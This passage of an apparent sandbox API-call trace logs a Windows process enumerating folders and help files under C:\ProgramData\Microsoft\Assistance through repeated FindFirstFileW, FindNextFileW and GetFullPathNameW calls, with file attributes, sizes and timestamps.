ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WINDOW~2")) returned 1 [0132.297] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WwanSvc", cAlternateFileName="")) returned 1 [0132.298] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0132.298] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0132.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f43c) returned 1 [0132.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f448) returned 1 [0132.298] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f42c) returned 1 [0132.298] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Assistance", nBufferLength=0x105, lpBuffer=0x691ef34, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Assistance", lpFilePart=0x0) returned 0x23 [0132.298] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\", nBufferLength=0x105, lpBuffer=0x691ef08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Assistance\\", lpFilePart=0x0) returned 0x24 [0132.298] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\*", lpFindFileData=0x691f154 | out: lpFindFileData=0x691f154*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x3fc949a4, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3fc949a4, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0132.298] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x3fc949a4, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3fc949a4, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.299] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x3fc949a4, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3fc949a4, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Client", cAlternateFileName="")) returned 1 [0132.299] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x3fc949a4, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3fc949a4, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Client", cAlternateFileName="")) returned 0 [0132.299] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0132.299] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3ec) returned 1 [0132.299] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3f8) returned 1 [0132.299] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f42c) returned 1 [0132.299] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Assistance", nBufferLength=0x105, lpBuffer=0x691ef34, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Assistance", lpFilePart=0x0) returned 0x23 [0132.299] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\", nBufferLength=0x105, lpBuffer=0x691ef08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Assistance\\", lpFilePart=0x0) returned 0x24 [0132.299] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\*", lpFindFileData=0x691f154 | out: lpFindFileData=0x691f154*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x3fc949a4, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3fc949a4, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0132.299] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x3fc949a4, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3fc949a4, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.300] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x3fc949a4, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3fc949a4, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Client", cAlternateFileName="")) returned 1 [0132.300] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0132.300] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0132.300] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3ec) returned 1 [0132.300] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3f8) returned 1 [0132.300] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f3dc) returned 1 [0132.300] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client", nBufferLength=0x105, lpBuffer=0x691eee4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Assistance\\Client", lpFilePart=0x0) returned 0x2a [0132.300] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\", nBufferLength=0x105, lpBuffer=0x691eeb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Assistance\\Client\\", lpFilePart=0x0) returned 0x2b [0132.300] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\*", lpFindFileData=0x691f104 | out: lpFindFileData=0x691f104*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x3fc949a4, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3fc949a4, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0132.301] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x3fc949a4, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3fc949a4, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.301] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0xa8f17049, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x243448f1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0", cAlternateFileName="")) returned 1 [0132.301] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0xa8f17049, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x243448f1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0", cAlternateFileName="")) returned 0 [0132.301] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0132.301] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f39c) returned 1 [0132.301] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3a8) returned 1 [0132.301] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f3dc) returned 1 [0132.301] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client", nBufferLength=0x105, lpBuffer=0x691eee4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Assistance\\Client", lpFilePart=0x0) returned 0x2a [0132.301] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\", nBufferLength=0x105, lpBuffer=0x691eeb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Assistance\\Client\\", lpFilePart=0x0) returned 0x2b [0132.301] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\*", lpFindFileData=0x691f104 | out: lpFindFileData=0x691f104*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x3fc949a4, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3fc949a4, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0132.302] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x3fc949a4, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3fc949a4, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.302] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0xa8f17049, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x243448f1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0", cAlternateFileName="")) returned 1 [0132.302] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0132.302] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0132.302] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f39c) returned 1 [0132.302] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3a8) returned 1 [0132.302] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f38c) returned 1 [0132.302] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0", nBufferLength=0x105, lpBuffer=0x691ee94, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0", lpFilePart=0x0) returned 0x2e [0132.302] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\", nBufferLength=0x105, lpBuffer=0x691ee68, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\", lpFilePart=0x0) returned 0x2f [0132.302] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\*", lpFindFileData=0x691f0b4 | out: lpFindFileData=0x691f0b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0xa8f17049, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x243448f1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0132.303] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0xa8f17049, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x243448f1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.303] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x243448f1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae0e8854, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae0e8854, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0132.303] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x243448f1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae0e8854, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae0e8854, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0132.303] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0132.303] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f34c) returned 1 [0132.303] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f358) returned 1 [0132.303] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f38c) returned 1 [0132.303] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0", nBufferLength=0x105, lpBuffer=0x691ee94, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0", lpFilePart=0x0) returned 0x2e [0132.303] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\", nBufferLength=0x105, lpBuffer=0x691ee68, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\", lpFilePart=0x0) returned 0x2f [0132.304] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\*", lpFindFileData=0x691f0b4 | out: lpFindFileData=0x691f0b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0xa8f17049, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x243448f1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0132.304] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0xa8f17049, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x243448f1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.304] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x243448f1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae0e8854, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae0e8854, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0132.304] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0132.304] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0132.304] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f34c) returned 1 [0132.304] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f358) returned 1 [0132.304] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f33c) returned 1 [0132.304] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US", nBufferLength=0x105, lpBuffer=0x691ee44, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US", lpFilePart=0x0) returned 0x34 [0132.304] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\", nBufferLength=0x105, lpBuffer=0x691ee18, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\", lpFilePart=0x0) returned 0x35 [0132.304] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*", lpFindFileData=0x691f064 | out: lpFindFileData=0x691f064*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x243448f1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae0e8854, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae0e8854, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0133.481] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x243448f1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae0e8854, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae0e8854, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0133.481] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x2436abaa, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xabde2c6f, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa65a8bbf, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x2f22, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help_CValidator.H1D", cAlternateFileName="HELP_C~1.H1D")) returned 1 [0133.481] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x24534c56, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae2660aa, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae2660aa, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x365fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help_MKWD_AssetId.H1W", cAlternateFileName="HELP_M~1.H1W")) returned 1 [0133.481] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x24534c56, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae409b6f, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae409b6f, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x325ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help_MKWD_BestBet.H1W", cAlternateFileName="HELP_M~2.H1W")) returned 1 [0133.482] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x24534c56, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae45604d, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae45604d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x79f1a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help_MTOC_help.H1H", cAlternateFileName="HELP_M~1.H1H")) returned 1 [0133.482] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x26353250, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae45604d, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae45604d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x3944, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help_MValidator.H1D", cAlternateFileName="HELP_M~1.H1D")) returned 1 [0133.482] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x24534c56, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae45604d, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae45604d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help_MValidator.Lck", cAlternateFileName="HELP_M~1.LCK")) returned 1 [0133.482] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x249fa376, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae0e8854, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae0e8854, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0xd5310, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", cAlternateFileName="HELP{9~1.H1Q")) returned 1 [0133.482] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, 